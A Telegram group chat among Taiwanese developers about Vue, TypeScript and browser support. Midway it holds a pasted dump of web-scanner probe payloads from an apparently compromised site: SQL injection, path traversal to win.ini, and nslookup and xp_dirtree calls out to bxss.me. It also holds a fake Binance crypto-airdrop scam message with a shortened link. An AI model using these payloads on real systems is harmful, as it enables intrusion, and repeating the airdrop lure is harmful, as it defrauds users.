這年頭充值 mac 信仰的價格越來越高了,幹嘛還充值
mac中文用戶更少,更可以犧牲
(住手
[photo](media:AgADBQADK6kxGznG8FeA--ydBzjdUNVQ9jIABFnFt_gGxTREEWwEAAEC@telegram)
[photo](media:AgADBQADLKkxGznG8FeD1sKbNTGgWJZu3zIABC2gGG7MEI4AAcZZBQABAg@telegram)
幹這時代還在分男女
哇 那 iOS 怎麼辦
太有建設性了吧
所以說啊 我所謂的copy paste是跟寫function同樣的東西
你不拆出來變成component在那邊一直複製貼上同樣結構的大元件是腦袋撞到嗎
現在還沒有使用 iOS 13 都去填海
可是誰說女生不能當水電的
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
然後不用vue file寫component超煩的
這種人我看多了
真的
我還認識全家姊妹都選工科的勒
小專案 小元件還勉強可以
人家撞牆你也要撞 好 這邏輯我懂 🌚
真的
我都還有個學美術的朋友,她還會修野狼咧
幹一路發是不是被打了
我可以打開
沒吧
我正常開
template我就覺得麻煩了
寫JS裡麻煩 不然就是要拆成file 然後就讓http request多一堆了
除了他的標體很js
裡面的文字沒有異常?
最近在研究 vscode 跟 language-server
去貢獻 vue 的插件 vetur
覺得超級好玩的
[photo](media:AgADAQAD86cxG9KW-UcuJfSCigiML-dsDDAABHXWR4iFPHh90hUFAAEC@telegram)
[photo](media:AgADBQADLakxGznG8FfErwZOE69Vk7Vu3zIABB3menal6Pkg7loFAAEC@telegram)
onmouseover
哦我剛看了 console
滿滿的 Error message
所以小專案 才適合

大概是你不超過 5 個元件
每個元件 template 不超過 5 行
應該只是js寫炸了吧
有用是有用 但不常用vscode所以(
例如什麼追蹤的嗎
你看 index
123
</script>
<!-- 1 -->
<script>
http://testasp.vulnweb.com/t/xss.html?%00.jpg
</script>
<!-- 1 -->
<script>
js_add.aspx/.
</script>
<!-- ";print(md5(acunetix_wvs_security_test));$a=" -->
<script>
123
</script>
<!-- 1 -->
<script>
http://hitTdlGOVXVCo.bxss.me/
</script>
<!-- http://testasp.vulnweb.com/t/xss.html?%00.jpg -->
<script>
123
</script>
<!-- ${@print(md5(acunetix_wvs_security_test))} -->
<script>
123
</script>
<!-- js_add.aspx -->
<script>
123
</script>
<!-- http://hitRI9fCB7RA1.bxss.me/ -->
<script>
123
</script>
<!-- js_add.aspx -->
<script>
123
</script>
<!-- 1 -->
<script>
1'"
</script>
<!-- 1 -->
<script>
\
</script>
<!-- ${@print(md5(acunetix_wvs_security_test))}\ -->
<script>
123
</script>
<!-- js_add.aspx/. -->
<script>
123
</script>
<!-- 1 -->
<script>
1����%2527%2522
</script>
<!-- 1 -->
<script>
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
</script>
<!-- 1 -->
<script>
/www.vulnweb.com
</script>
<!-- 1 -->
<script>
@@HaENO
</script>
<!-- 1 -->
<script>
JyI=
</script>
<!-- 1 -->
<script>
�'�"
</script>
<!-- 1 -->
<script>
�''�""
</script>
<!-- /www.vulnweb.com -->
<script>
123
</script>
<!-- 1'" -->
<script>
123
</script>
<!-- \ -->
<script>
123
</script>
<!-- 1����%2527%2522 -->
<script>
123
</script>
<!-- @@INO5Y -->
<script>
123
</script>
<!-- JyI= -->
<script>
123
</script>
<!-- 1 -->
<script>
'"
</script>
<!-- �'�" -->
<script>
123
</script>
<!-- �''�"" -->
<script>
123
</script>
<!-- '" -->
<script>
123
</script>
<!-- 1 -->
<script>
1239759431
</script>
<!-- 19726462 -->
<script>
123
</script>
`
被打 XSS 惹吧
|]*{
<>�''💩
</script>
<!-- 1 -->
<script>
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
</script>
<!-- 1 -->
<script>
123
</script>
<!-- 1 -->
<script>
WEB-INF/web.xml
</script>
<!-- -->
<script>
123
</script>
<!-- 12345'"\'\");|]*{
<>�''💩 -->
<script>
123
</script>
<!-- -->
<script>
123
</script>
<!-- 1 -->
<script>
832'
</script>
<!-- 1 -->
<script>
123
</script>
<!-- 1 -->
<script>
123
</script>
<!-- 1 -->
<script>
${9999594+9999888}
</script>
<!-- hlpPsuZN -->
<script>
123
</script>
<!-- ${10000306+10000253} -->
<script>
123
</script>
<!-- -1 OR 2+117-117-1=0+0+0+1 -- -->
<script>
123
</script>
<!-- -1 OR 2+682-682-1=0+0+0+1 -->
<script>
123
</script>
<!-- -1' OR 2+434-434-1=0+0+0+1 -- -->
<script>
123
</script>
<!-- -1' OR 2+301-301-1=0+0+0+1 or 'RnjakK0a'=' -->
<script>
123
</script>
<!-- 1 -->
<script>
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
</script>
<!-- -1" OR 2+176-176-1=0+0+0+1 -- -->
<script>
123
</script>
<!-- 1 -->
<script>
1some_inexistent_file_with_long_name.jpg
</script>
<!-- 1 -->
<script>
Http://testasp.vulnweb.com/t/fit.txt
</script>
<!-- 1 -->
<script>
http://testasp.vulnweb.com/t/fit.txt?.jpg
</script>
<!-- 1 -->
<script>
testasp.vulnweb.com
</script>
<!-- 1some_inexistent_file_with_long_name.jpg -->
<script>
123
</script>
<!-- Http://testasp.vulnweb.com/t/fit.txt -->
<script>
123
</script>
<!-- http://testasp.vulnweb.com/t/fit.txt?.jpg -->
<script>
123
</script>
<!-- testasp.vulnweb.com -->
<script>
123
</script>
<!-- 1 -->
<script>
WEB-INF\web.xml
</script>
<!-- ../../../../../../../../../../windows/win.ini -->
<script>
123
</script>
<!-- -1; waitfor delay '0:0:9' -- -->
<script>
123
</script>
<!-- -1); waitfor delay '0:0:3' -- -->
<script>
123
</script>
<!-- -1)); waitfor delay '0:0:3' -- -->
<script>
123
</script>
<!-- 1 waitfor delay '0:0:3' -- -->
<script>
123
</script>
<!-- 7NEUCtLq'; waitfor delay '0:0:3' -- -->
<script>
123
</script>
<!-- C:\WINDOWS\system32\drivers\etc\hosts -->
<script>
123
</script>
<!-- MtrBkPaM'); waitfor delay '0:0:6' -- -->
<script>
123
</script>
<!-- ../../../../../../../../../../windows/win.ini.jpg -->
<script>
123
</script>
<!-- Exa2ketT')); waitfor delay '0:0:6' -- -->
<script>
123
</script>
<!-- ................windowswin.ini -->
<script>
123
</script>
<!-- -1;select pg_sleep(9); -- -->
<script>
123
</script>
<!-- -1);select pg_sleep(9); -- -->
<script>
123
</script>
<!-- -1));select pg_sleep(9); -- -->
<script>
123
</script>
<!-- ..\..\..\..\..\..\..\..\windows\win.ini -->
<script>
123
</script>
<!-- dSkN8NKV';select pg_sleep(3); -- -->
<script>
123
</script>
<!-- /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini -->
<script>
123
</script>
<!-- lTOCgQE2');select pg_sleep(3); -- -->
<script>
123
</script>
<!-- YYOGawFX'));select pg_sleep(3); -- -->
<script>
123
</script>
<!-- WEB-INF/web.xml -->
<script>
123
</script>
<!-- WEB-INF\web.xml -->
<script>
123
</script>
<!-- 1 -->
<script>
123&n967860=v976161
</script>
<!-- 1&n902252=v924331 -->
<script>
123
</script>
<!-- 1 -->
<script>
)
</script>
<!-- 1 -->
<script>
!(()&&!|*|*|
</script>
<!-- 1 -->
<script>
^(#$!@#$)(()))******
</script>
<!-- 1 -->
<script>
123
</script>
<!-- 1 -->
<script>
'"()
</script>
<!-- -->
<script>
123
</script>
<!-- ) -->
<script>
123
</script>
<!-- '"() -->
<script>
123
</script>
<!-- !(()&&!|*|*| -->
<script>
123
</script>
<!-- 114' -->
<script>
123
</script>
<!-- ^(#$!@#$)(()))****** -->
<script>
123
</script>
<!-- 1 -->
<script>
;print(md5(acunetix_wvs_security_test));
</script>
<!-- 1 -->
<script>
';print(md5(acunetix_wvs_security_test));$a='
</script>
<!-- 1 -->
<script>
";print(md5(acunetix_wvs_security_test));$a="
</script>
<!-- 1 -->
<script>
${@print(md5(acunetix_wvs_security_test))}
</script>
<!-- 1 -->
<script>
${@print(md5(acunetix_wvs_security_test))}\
</script>
<!-- 1 -->
<script>
js_add.aspx
</script>
<!-- ;print(md5(acunetix_wvs_security_test)); -->
<script>
123
</script>
<!-- 1 -->
<script>
js_add.aspx
</script>
<!-- ';print(md5(acunetix_wvs_security_test));$a=' -->
<script>
`
<script>
228'
</script>
<!-- 1 -->
<script>
123
</script>
<!-- 1 -->
<script>
response.write(9224586*9060259)
</script>
<!-- 1 -->
<script>
'+response.write(9224586*9060259)+'
</script>
<!-- 1 -->
<script>
123
</script>
<!-- 1 -->
<script>
"+response.write(9224586*9060259)+"
</script>
<!-- 1 -->
<script>
123
</script>
<!-- response.write(9014691*9753105) -->
<script>
123
</script>
<!-- 1 -->
<script>
X4xTxiPQ
</script>
<!-- '+response.write(9014691*9753105)+' -->
<script>
123
</script>
<!-- 1 -->
<script>
-1 OR 2+508-508-1=0+0+0+1 --
</script>
<!-- "+response.write(9014691*9753105)+" -->
<script>
123
</script>
<!-- 1 -->
<script>
-1 OR 2+109-109-1=0+0+0+1
</script>
<!-- 1 -->
<script>
-1' OR 2+638-638-1=0+0+0+1 --
</script>
<!-- 1 -->
<script>
-1' OR 2+786-786-1=0+0+0+1 or 't2kLa4r1'='
</script>
<!-- 1 -->
<script>
-1" OR 2+469-469-1=0+0+0+1 --
</script>
<!-- 1 -->
<script>
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
</script>
<!-- 1 -->
<script>
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
</script>
<!-- 1 -->
<script>
-1; waitfor delay '0:0:6' --
</script>
<!-- 1 -->
<script>
-1); waitfor delay '0:0:6' --
</script>
<!-- 1 -->
<script>
-1)); waitfor delay '0:0:6' --
</script>
<!-- 1 -->
<script>
set|set&set
</script>
<!-- 1 -->
<script>
$(nslookup dns.ce.\065888.79-7109.79.23017.\1.bxss.me)
</script>
<!-- 1 -->
<script>
&nslookup dns.ce.\065888.79-7110.79.23017.\1.bxss.me&'\"`0&nslookup dns.ce.\065888.79-7110.79.23017.\1.bxss.me&`'
</script>
<!-- 1 -->
<script>
1 waitfor delay '0:0:9' --
</script>
<!-- 1 -->
<script>
liXBeodv'; waitfor delay '0:0:3' --
</script>
<!-- 1 -->
<script>
dYUMCjYm'); waitfor delay '0:0:3' --
</script>
<!-- 1 -->
<script>
oXG8ng7D')); waitfor delay '0:0:3' --
</script>
<!-- set|set&set -->
<script>
123
</script>
<!-- 1 -->
<script>
-1;select pg_sleep(6); --
</script>
<!-- 1 -->
<script>
9Yi2dGT3
</script>
<!-- oUIlKVPa -->
<script>
123
</script>
<!-- 1 -->
<script>
-1);select pg_sleep(6); --
</script>
<!-- 1 -->
<script>
-1));select pg_sleep(6); --
</script>
<!-- 1 -->
<script>
ez2P7bBX';select pg_sleep(6); --
</script>
<!-- 1 -->
<script>
A0bQu8HC');select pg_sleep(6); --
</script>
<!-- 1 -->
<script>
123
bcc:065888.79-7121.79.23017.1@bxss.me
</script>
<!-- 1 -->
<script>
to@example.com>
bcc:065888.79-7122.79.23017.1@bxss.me
</script>
<!-- 1
bcc:065888.79-7123.79.23017.1@bxss.me -->
<script>
123
</script>
<!-- 1 -->
<script>
JyDt2owA'));select pg_sleep(9); --
</script>
<!-- 1 -->
<script>
../../../../../../../../../../windows/win.ini
</script>
<!-- 1 -->
<script>
123||UTL_INADDR.get_host_address('dns.'||'sqli.065888.79-7125.79.23017.1.bxss'||'.me')
</script>
<!-- 1 -->
<script>
C:\WINDOWS\system32\drivers\etc\hosts
</script>
<!-- 1 -->
<script>
../../../../../../../../../../windows/win.ini.jpg
</script>
<!-- 1 -->
<script>
'||UTL_INADDR.get_host_address('dns.'||'sqli.065888.79-7126.79.23017.1.bxss'||'.me')||'
</script>
<!-- 1 -->
<script>
������������������������������������������������windows��win.ini
</script>
<!-- 1 -->
<script>
................windowswin.ini
</script>
<!-- 1 -->
<script>
123;EXEC master..xp_dirtree '\\dns.sqli.065888.79-7127.79.23017.1.bxss.me\' --
</script>
<!-- 1 -->
<script>
..\..\..\..\..\..\..\..\windows\win.ini
</script>
<!-- 1 -->
<script>
123';EXEC master..xp_dirtree '\\dns.sqli.065888.79-7128.79.23017.1.bxss.me\' --
</script>
<!-- 1 -->
<script>
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
</script>
<!-- 1 -->
<script>
123');EXEC master..xp_dirtree '\\dns.sqli.065888.79-7129.79.23017.1.bxss.me\' --
</script>
<!-- 1 -->
<script>

</script>
<!-- 1 -->
<script>
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
</script>
<!-- 1 -->
<script>
123;copy (select '') to program 'nslookup dns.sqli.\065888.79-7130.79.23017.\1.bxss.me'
</script>
<!-- 1 -->
<script>
123';copy (select '') to program 'nslookup dns.sqli.\065888.79-7131.79.23017.\1.bxss.me
</script>
<!-- 1 -->
<script>
12345'"\'\");
大大很洗
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
沒想到那麼多行w
[photo](media:AgADBQADLqkxGznG8Ff5YOy90btu401U9jIABH4mevPF8XS0TW0EAAEC@telegram)
你可以用支援 language server 的 editor 也可以享受到
指示作者消失了 還沒有收我的 PR
可以這很XSS
[photo](media:AgADBQADMKkxGznG8Fd5JKb_YF7rG9dV9jIABLMh_n9Y-_sVwWoEAAEC@telegram)
不行 超過一個tag不好好format我就受不了了(
但只有一個tag的話根本不用component了 🌚
你可以用 ES6 template 的語法啊
你的地址是不是要被噴出去了
這看起來整個主機都淪陷了啊
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
應該說DB
不compile讓瀏覽器直接吃嗎(((
其實我比較好奇的是他們要怎麽應對
被sql injection了吧
直接還原到上個備份點嗎(?
rollback 吧
雖然放生不夠新的瀏覽器很爽啦www
祈禱他們有開binary log(
我猜後台被猜到密碼之類ㄉㄅ
其實template string可以html highlight
不像
vscode有插件專門做這個
我也很想不compile然後直接把舊瀏覽器放生光光齁(
https://caniuse.com/#search=template
這個支援度可以啦
/* html */`
<div>
  有 highlight
</div>
`


這樣
對 可以只是 Vetur 沒有做
該是時候pr惹(
加個註解就能使用highlight
我已經發兩個 PR 了
正準備有空發個 第三個 PR
除非你考慮 IE 不然沒理由還要 compile
都感謝不用擔心IE8了 🌚
target 兩年內 > 5%,ie就直接不見了吧
可以啦
我們官網都放生webp不支援的了
🌚
這個有點誇張
babel要支援ie還要特地打開
現代瀏覽器都支援了
Firefox chrome edge都支援了
🤔 然後我覺得我mac TG的 @ 又壞了 卡在那按不掉
覆蓋99%了
沒事
你有想過 The new IE 嗎?
放生
放生
那貨比safari還坑
可憐的 iOS 用戶
@Haraguroicha
又沒收錢幹嘛特地去支援
沒有 OKTW超放生(O
其實我是指 safari 欸
是啊
他比ie坑阿
放生
毫無疑問
XD
連我都要放生 Safari 了,我哪裡會可憐啊
各種不按spec來亂實作一通
所以說你的iOS App (X
ㄍㄋㄇㄉ
那你的 iPhone 怎麼辦?
不能 swift 的也都放生
哈哈哈 iframe(逃
行(
佛系開發者
對我來說能打電話能潮就好
OPass 現在哪個不是這樣幹(#
不過music bot最大問題還是ts
我不想寫TS QQ
那就改 golang (#
改TS我可以
寫TS我不行(
你可以寫js
真佛系 說好的信仰呢(?
我完全可以接受你在裡面混js
不存在了,我沒錢去充值
還要先看看怎麼混 🤔
除了safari我沒看過哪個瀏覽器卷軸能直接卷出內容高度的
這三小
新的檔案都用.js阿
反正ts會把他原封不動的複製過去吧
明明內容就被比容器低還出現卷軸導致炸裂
我整個:
直接用就好
頂多 checkJS 打開
或者你可以TS當js寫
我最後選擇把內容 fixed
error都當假的
真巧,我也是
直接幹你娘fixed
反正會動
🌚
會動就好管他紅紅的
這是不是回錯話?
感覺你們可以直接拔掉 Typescript 啊
這樣連 Error 都不會有了
可是要把那一堆type宣告刪掉
很累
就繼續讓他發揮把type宣告拿掉的功能喔
[sticker](media:AAQBABN1JtQvAATde6D7VZMdvhNQAAIC@telegram)
你可以直接編譯完的 code 變 code 啊
聽起來很有道理
🤔 不清楚 因為我跟TS真心不熟(O
🚀 Hеllo
🚀 Good Nеws
🚀 АIRDROP АNNOUNCED Binаncе-Exchаngе
🚀 Аnyonе cаn pаrticipаtе аnd rеcеivе а minimum of 10 ETHEREUM or 0.5 Bitcoin
✅ Info https://bit.ly/АNNOUNCED_AIRDROP
Group t.me/joinchat/Mp0PV00Z-lfr3l-maqD_1w
{ "allowJs": true }
不然就試試 babel 7 的 typescript 支援
用 babel 拔掉也行
有了
大概
超有道理 其實我在想根本可以直接把ts都刪掉
然後cp -r dist/* . (
結果我記錯 key 了 =_=
[photo](media:AgADAgADfasxG0hx-UsxVmSVLNdPuLAGUg8ABMjvCLg1ebfVMk8EAAEC@telegram)
[photo](media:AgADAgADoasxG8zz8UtNCGd1VaN1-s1KXw8ABEI2oo7HAvvzQt4FAAEC@telegram)
不能帶回台灣的東西 無奈
[photo](media:AgADAgADoqsxG8zz8UvJFKacUFYlvCq6UQ8ABI2v1pnXAtSKSFAEAAEC@telegram)
你可以先推一個PR做這件事
看起來是有了(
帶來香港
你確定可ㄇ
🤔
你們是不是腦筋轉不過來 XD
熟的可以
生肉不行
說起來到底為毛是ts啊 又是某人的鍋嗎 🌚
只是記得調整 Typescript 編譯成新一點的 ES 標準
TS很簡單啊,就是把js副檔名改成ts
他就變ts了,太厲害了
寄的呢
(點頭
有人喜歡 iOS 的鍵盤嗎?
[sticker](media:AAQBABN1JtQvAATde6D7VZMdvhNQAAIC@telegram)
對 是沒錯XD
我用得好崩潰嗚嗚
我印象中已經很新了
那就乾脆直接 JS 就好了啊
我已經後悔很久了
[sticker](media:AAQFABOJJx0sAAQeYKfU8XnhsvFqAQABAg@telegram)
用 ts 是防別人呆
我是覺得大型專案 TS 很好用啦
其它還是 JS 好
用 Vue / React 都有 props check 就沒必要 ts
TS就是讓你產能歸零的東西
(點頭
光找 typeDefs 就想死
因為產能歸零,所以bug製造率也跟著歸零了
TS就是那麼有用
原來如此 🌚
@yoyo930021 我新 project 轉了用 React
其實重點在TS設計上只在編譯時檢查,執行時完全沒有任何型別檢查
所以還是會發生編譯過,跑起來炸掉
這樣是不夠的
然後你的 dataSource 就把你雷到 bug 掉(望
[sticker](media:AAQFABMiPNAyAARycBCMs4RD2pkgAAIC@telegram)
🤔 所以web是要登入即register嗎
登入時直接去戳user manager抓,沒抓到的話叫他去用TG/discord註冊這樣
是有機會的
但只有開起嚴格模式
你會少很多這樣的機會

最重要的我反而覺得是自動提示
以及讀 code 追 code 速度
Typescript 比 JS 快很多
這種問題應該去找 dataSource
用ts搞不定自動完成還是別用了吧…真的產能歸零
我覺得在網頁上註冊TG怪怪的
追一追就全都掉進 types file orz...
那是你的用戶
不過如果能搞定自動完成就很爽
discord有現成的login with嗎 沒有的話放生(O
所以有個叫做validator的東西
掉進去 就是別人 Libaray 的問題了
不知道,可能有
反正有TG就很夠了其實
誰他媽亂喂資料我就自殺
我保證你亂喂不會動
你要阻止你的用戶這麼做
這就是前端
TG看起來很好做 直接script搞定(
然後公司一堆智障的沒檢查(眼神死
然後配個jsonschema
對,我就是不喜歡這點
他都檢查type了,為什麼不能順便生出確保type的code
像是number被塞了string
因為他不想要,好像答案就是這樣而已
笑能問題
aka. not design goal
跟效能也沒關係
那是你要自己檢查的吧
因為它的目標是 JavaScript 的子集
是說目前看起來很Telegram管理Discord播放?
HTML 5 的 input field 已經幫忙省很多時間了
至少我可以限定你只能用 positive integer
他要想辦法一直跟 ES 標準是相容狀態
我覺得那個有點小坑
用json schema,有個generator,你把物件扔進去他就自動幫你生對應的驗證模板
當你老闆用 Windows XP & IE 時
你不如一槍打死我
然後你就把輸入跟模板塞進去validator,有問題就會噴錯了
我覺得可以從源頭處理
像是 input 出來都是 string
要自己手動處理成 number
只要輸入的key少了半個都不會動每一個都會噴錯
然後你的 user 就嚇到不敢用
這個是婊後端用的
再亂改啊
前端的你自己知道有啥欄位阿
然後後端加一個 field
沒事
加沒事,減才會噴給你看
人家沒保證 forward compartible 啊!
然後叫轉用 v3
你看看 fb
不可否認 TS 有時候用起來很煩
但別人看你的 code 或維護 會很開心
各種 API 經常改
用library可以不用一直看doc很棒
前提是他有.d
這樣至少他通知你了
不是莫名被改你背鍋
然後只給你一個星期時間 orz...

不過大部分常用的其實都有了
這個你要去給pm抱怨
然後逼你塞_id進mongodb(#
你可以 declare 自己加
都在 JS 社區了 這些事很正常(O
好 終於消掉 @ 了 🙃
喔還有.d過期了,用到各種棄用的方法
TG API和discord api我就遇到過好幾次
還有 .d 沒有標明的 method
因為code跟def是分開的,問題就是這樣而已
🤔 不過說真的 我寫完大概也不會用吧 除非我要把我的歌全部塞進去(X
java你又不可能改了實作忘記改定義
不意外 畢竟除非你 lib 用 TS 寫
不然 .d.ts 很難維護其實

某種程度而言 這也是用 TS 的好處
甚至不同人寫的
express middleware 各種的把 typeDefs 搞死
這點(ry
應該是沒問題(?
他會把歌都壓成opus就是了
這也是為什麼很多人用的 lib 的專案
開始重構成 Typescript 來寫
bitrate預設256,設定檔可以調
我覺得會先死人 要把>100k個的檔案用TG丟真心會死人(O
wwww
我感受到硬碟會爆炸
rate limit 先炸
沒事 我都用4T裝了 希望暫時還不用換 雖然一大半原因是因為FLAC很多(
全部都轉opus也要上百G吧
[sticker](media:AAQFABOJJx0sAAQeYKfU8XnhsvFqAQABAg@telegram)
肯定要 🌚
這大小的話我要塞進k8s存ceph才行
說起來是不是應該要讓cf能cache檔案啊 🤔
管他的不重要(
反正就一個page rule而已
我全用POST要檔案喔(X
[sticker](media:AAQFABNDpd8yAATUDKXoP8lAx0IkAAIC@telegram)
不如說用ws
不過感覺會先搞死自己(
好主意(X
我還真看過有人網頁上所有操作都用ws的
網頁開起來戳任何東西都沒新請求